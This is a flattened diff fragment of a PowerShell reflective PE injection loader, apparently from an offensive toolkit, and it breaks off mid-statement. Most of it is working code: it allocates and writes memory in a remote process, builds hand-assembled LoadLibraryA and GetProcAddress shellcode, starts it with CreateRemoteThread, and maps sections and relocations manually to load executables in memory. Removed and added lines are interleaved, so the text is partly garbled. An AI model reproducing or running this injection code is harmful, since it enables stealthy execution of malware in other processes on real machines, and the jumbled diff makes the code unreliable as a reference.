$imageNtHeaders64 - $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true - } - else - { - $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32) - $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32 - $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false - } - - return $NtHeadersInfo - } - - - #This function will get the information needed to allocated space in memory for the PE - Function Get-PEBasicInfo - { - Param( - [Parameter( Position = 0, Mandatory = $true )] - [Byte[]] - $PEBytes, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $Win32Types - ) - - $PEInfo = New-Object System.Object - - #Write the PE to memory temporarily so I can get information from it. This is not it's final resting spot. - [IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length) - [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null - - #Get NtHeadersInfo - $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types - - #Build a structure with the information which will be needed for allocating memory and writing the PE to memory - $PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit) - $PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase) - $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage) - $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders) - $PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics) - - #Free the memory allocated above, this isn't where we allocate the PE to memory - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes) - - return $PEInfo - } - - - #PEInfo must contain the following NoteProperties: - # PEHandle: An IntPtr to the address the PE is loaded to in memory - Function Get-PEDetailedInfo - { - Param( - [Parameter( Position = 0, Mandatory = $true)] - [IntPtr] - $PEHandle, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $Win32Types, - - [Parameter(Position = 2, Mandatory = $true)] - [System.Object] - $Win32Constants - ) - - if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero) - { - throw 'PEHandle is null or IntPtr.Zero' - } - - $PEInfo = New-Object System.Object - - #Get NtHeaders information - $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types - - #Build the PEInfo object - $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle - $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS) - $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr) - $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit) - $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage) - - if ($PEInfo.PE64Bit -eq $true) - { - [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64))) - $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr - } - else - { - [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32))) - $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr - } - - if (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL) - { - $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL' - } - elseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) - { - $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE' - } - else - { - Throw "PE file is not an EXE or DLL" - } - - return $PEInfo - } - - - Function Import-DllInRemoteProcess - { - Param( - [Parameter(Position=0, Mandatory=$true)] - [IntPtr] - $RemoteProcHandle, - - [Parameter(Position=1, Mandatory=$true)] - [IntPtr] - $ImportDllPathPtr - ) - - $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) - - $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr) - $DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1) - $RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) - if ($RImportDllPathPtr -eq [IntPtr]::Zero) - { - Throw "Unable to allocate memory in the remote process" - } - - [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero - $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten) - - if ($Success -eq $false) - { - Throw "Unable to write DLL path to remote process memory" - } - if ($DllPathSize -ne $NumBytesWritten) - { - Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process" - } - - $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll") - $LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "LoadLibraryA") #Kernel32 loaded to the same address for all processes - - [IntPtr]$DllAddress = [IntPtr]::Zero - #For 64bit DLL's, we can't use just CreateRemoteThread to call LoadLibrary because GetExitCodeThread will only give back a 32bit value, but we need a 64bit address - # Instead, write shellcode while calls LoadLibrary and writes the result to a memory address we specify. Then read from that memory once the thread finishes. - if ($PEInfo.PE64Bit -eq $true) - { - #Allocate memory for the address returned by LoadLibraryA - $LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) - if ($LoadLibraryARetMem -eq [IntPtr]::Zero) - { - Throw "Unable to allocate memory in the remote process for the return value of LoadLibraryA" - } - - - #Write Shellcode to the remote process which will call LoadLibraryA (Shellcode: LoadLibraryA.asm) - $LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9) - $LoadLibrarySC2 = @(0x48, 0xba) - $LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba) - $LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3) - - $SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3) - $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength) - $SCPSMemOriginal = $SCPSMem - - Write-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false) - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) - Write-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false) - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) - Write-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false) - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) - Write-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length) - - - $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) - if ($RSCAddr -eq [IntPtr]::Zero) - { - Throw "Unable to allocate memory in the remote process for shellcode" - } - - $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten) - if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength)) - { - Throw "Unable to write shellcode to remote process memory." - } - - $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions - $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) - if ($Result -ne 0) - { - Throw "Call to CreateRemoteThread to call GetProcAddress failed." - } - - #The shellcode writes the DLL address to memory in the remote process at address $LoadLibraryARetMem, read this memory - [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) - $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten) - if ($Result -eq $false) - { - Throw "Call to ReadProcessMemory failed" - } - [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr]) - - $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null - $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null - } - else - { - [IntPtr]$RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions - $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) - if ($Result -ne 0) - { - Throw "Call to CreateRemoteThread to call GetProcAddress failed." - } - - [Int32]$ExitCode = 0 - $Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode) - if (($Result -eq 0) -or ($ExitCode -eq 0)) - { - Throw "Call to GetExitCodeThread failed" - } - - [IntPtr]$DllAddress = [IntPtr]$ExitCode - } - - $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null - - return $DllAddress - } - - - Function Get-RemoteProcAddress - { - Param( - [Parameter(Position=0, Mandatory=$true)] - [IntPtr] - $RemoteProcHandle, - - [Parameter(Position=1, Mandatory=$true)] - [IntPtr] - $RemoteDllHandle, - - [Parameter(Position=2, Mandatory=$true)] - [IntPtr] - $FunctionNamePtr,#This can either be a ptr to a string which is the function name, or, if LoadByOrdinal is 'true' this is an ordinal number (points to nothing) - [Parameter(Position=3, Mandatory=$true)] - [Bool] - $LoadByOrdinal - ) + Function Test-MemoryRangeValid + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [String] + $DebugString, - $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $PEInfo, - [IntPtr]$RFuncNamePtr = [IntPtr]::Zero #Pointer to the function name in remote process memory if loading by function name, ordinal number if loading by ordinal - #If not loading by ordinal, write the function name to the remote process memory - if (-not $LoadByOrdinal) + [Parameter(Position = 2, Mandatory = $true)] + [IntPtr] + $StartAddress, + + [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)] + [IntPtr] + $Size + ) + + [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size)) + + $PEEndAddress = $PEInfo.EndAddress + + if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true) { - $FunctionName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($FunctionNamePtr) - - #Write FunctionName to memory (will be used in GetProcAddress) - $FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1) - $RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) - if ($RFuncNamePtr -eq [IntPtr]::Zero) - { - Throw "Unable to allocate memory in the remote process" - } - - [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero - $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten) - if ($Success -eq $false) - { - Throw "Unable to write DLL path to remote process memory" - } - if ($FunctionNameSize -ne $NumBytesWritten) - { - Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process" - } + Throw "Trying to write to memory smaller than allocated address range. $DebugString" } - #If loading by ordinal, just set RFuncNamePtr to be the ordinal number - else + if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true) { - $RFuncNamePtr = $FunctionNamePtr + Throw "Trying to write to memory greater than allocated address range. $DebugString" } - - #Get address of GetProcAddress - $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll") - $GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "GetProcAddress") #Kernel32 loaded to the same address for all processes - - - #Allocate memory for the address returned by GetProcAddress - $GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) - if ($GetProcAddressRetMem -eq [IntPtr]::Zero) - { - Throw "Unable to allocate memory in the remote process for the return value of GetProcAddress" - } - - - #Write Shellcode to the remote process which will call GetProcAddress - #Shellcode: GetProcAddress.asm - [Byte[]]$GetProcAddressSC = @() - if ($PEInfo.PE64Bit -eq $true) - { - $GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9) - $GetProcAddressSC2 = @(0x48, 0xba) - $GetProcAddressSC3 = @(0x48, 0xb8) - $GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9) - $GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3) - } - else - { - $GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8) - $GetProcAddressSC2 = @(0xb9) - $GetProcAddressSC3 = @(0x51, 0x50, 0xb8) - $GetProcAddressSC4 = @(0xff, 0xd0, 0xb9) - $GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3) - } - $SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4) - $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength) - $SCPSMemOriginal = $SCPSMem - - Write-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false) - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) - Write-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false) - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) - Write-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false) - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) - Write-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length) - [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false) - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) - Write-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem - $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length) - - $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) - if ($RSCAddr -eq [IntPtr]::Zero) - { - Throw "Unable to allocate memory in the remote process for shellcode" - } - [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero - $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten) - if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength)) - { - Throw "Unable to write shellcode to remote process memory." - } - - $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions - $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) - if ($Result -ne 0) - { - Throw "Call to CreateRemoteThread to call GetProcAddress failed." - } - - #The process address is written to memory in the remote process at address $GetProcAddressRetMem, read this memory - [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) - $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten) - if (($Result -eq $false) -or ($NumBytesWritten -eq 0)) - { - Throw "Call to ReadProcessMemory failed" - } - [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr]) + } - #Cleanup remote process memory - $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null - $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + Function Write-BytesToMemory + { + Param( + [Parameter(Position=0, Mandatory = $true)] + [Byte[]] + $Bytes, - if (-not $LoadByOrdinal) + [Parameter(Position=1, Mandatory = $true)] + [IntPtr] + $MemoryAddress + ) + + for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++) { - $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset]) } - - return $ProcAddress - } - - - Function Copy-Sections - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [Byte[]] - $PEBytes, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $PEInfo, - - [Parameter(Position = 2, Mandatory = $true)] - [System.Object] - $Win32Functions, - - [Parameter(Position = 3, Mandatory = $true)] - [System.Object] - $Win32Types - ) - - for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++) - { - [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER))) - $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER) - - #Address to copy the section to - [IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress)) - - #SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated - # in memory for the section. If VirtualSize > SizeOfRawData, pad the extra spaces with 0. If - # SizeOfRawData > VirtualSize, it is because the section stored on disk has padding that we can throw away, - # so truncate SizeOfRawData to VirtualSize - $SizeOfRawData = $SectionHeader.SizeOfRawData - - if ($SectionHeader.PointerToRawData -eq 0) - { - $SizeOfRawData = 0 - } - - if ($SizeOfRawData -gt $SectionHeader.VirtualSize) - { - $SizeOfRawData = $SectionHeader.VirtualSize - } - - if ($SizeOfRawData -gt 0) - { - Test-MemoryRangeValid -DebugString "Copy-Sections::MarshalCopy" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null - [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData) - } - - #If SizeOfRawData is less than VirtualSize, set memory to 0 for the extra space - if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize) - { - $Difference = $SectionHeader.VirtualSize - $SizeOfRawData - [IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData)) - Test-MemoryRangeValid -DebugString "Copy-Sections::Memset" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null - $Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null - } - } - } - - - Function Update-MemoryAddresses - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [System.Object] - $PEInfo, - - [Parameter(Position = 1, Mandatory = $true)] - [Int64] - $OriginalImageBase, - - [Parameter(Position = 2, Mandatory = $true)] - [System.Object] - $Win32Constants, - - [Parameter(Position = 3, Mandatory = $true)] - [System.Object] - $Win32Types - ) - - [Int64]$BaseDifference = 0 - $AddDifference = $true #Track if the difference variable should be added or subtracted from variables - [UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION) - - #If the PE was loaded to its expected address or there are no entries in the BaseRelocationTable, nothing to do - if (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) ` - -or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0)) - { - return - } - - - elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true) - { - $BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle) - $AddDifference = $false - } - elseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true) - { - $BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase) - } - - #Use the IMAGE_BASE_RELOCATION structure to find memory addresses which need to be modified - [IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress)) - while($true) - { - #If SizeOfBlock == 0, we are done - $BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION) - - if ($BaseRelocationTable.SizeOfBlock -eq 0) - { - break - } - - [IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress)) - $NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2 - - #Loop through each relocation - for($i = 0; $i -lt $NumRelocations; $i++) - { - #Get info for this relocation - $RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i))) - [UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16]) - - #First 4 bits is the relocation type, last 12 bits is the address offset from $MemAddrBase - [UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF - [UInt16]$RelocType = $RelocationInfo -band 0xF000 - for ($j = 0; $j -lt 12; $j++) - { - $RelocType = [Math]::Floor($RelocType / 2) - } - - #For DLL's there are two types of relocations used according to the following MSDN article. One for 64bit and one for 32bit. - #This appears to be true for EXE's as well. - # Site: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx - if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) ` - -or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64)) - { - #Get the current memory address and update it based off the difference between PE expected base address and actual base address - [IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset)) - [IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr]) - - if ($AddDifference -eq $true) - { - [IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference)) - } - else - { - [IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference)) - } - - [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null - } - elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE) - { - #IMAGE_REL_BASED_ABSOLUTE is just used for padding, we don't actually do anything with it - Throw "Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo" - } - } - - $BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock)) - } - } - - - Function Import-DllImports - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [System.Object] - $PEInfo, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $Win32Functions, - - [Parameter(Position = 2, Mandatory = $true)] - [System.Object] - $Win32Types, - - [Parameter(Position = 3, Mandatory = $true)] - [System.Object] - $Win32Constants, - - [Parameter(Position = 4, Mandatory = $false)] - [IntPtr] - $RemoteProcHandle - ) - - $RemoteLoading = $false - if ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle) - { - $RemoteLoading = $true - } - - if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0) - { - [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress) - - while ($true) - { - $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR) - - #If the structure is null, it signals that this is the end of the array - if ($ImportDescriptor.Characteristics -eq 0 ` - -and $ImportDescriptor.FirstThunk -eq 0 ` - -and $ImportDescriptor.ForwarderChain -eq 0 ` - -and $ImportDescriptor.Name -eq 0 ` - -and $ImportDescriptor.TimeDateStamp -eq 0) - { - Write-Verbose "Done importing DLL imports" - break - } - - $ImportDllHandle = [IntPtr]::Zero - $ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)) - $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr) - - if ($RemoteLoading -eq $true) - { - $ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr - } - else - { - $ImportDllHandle 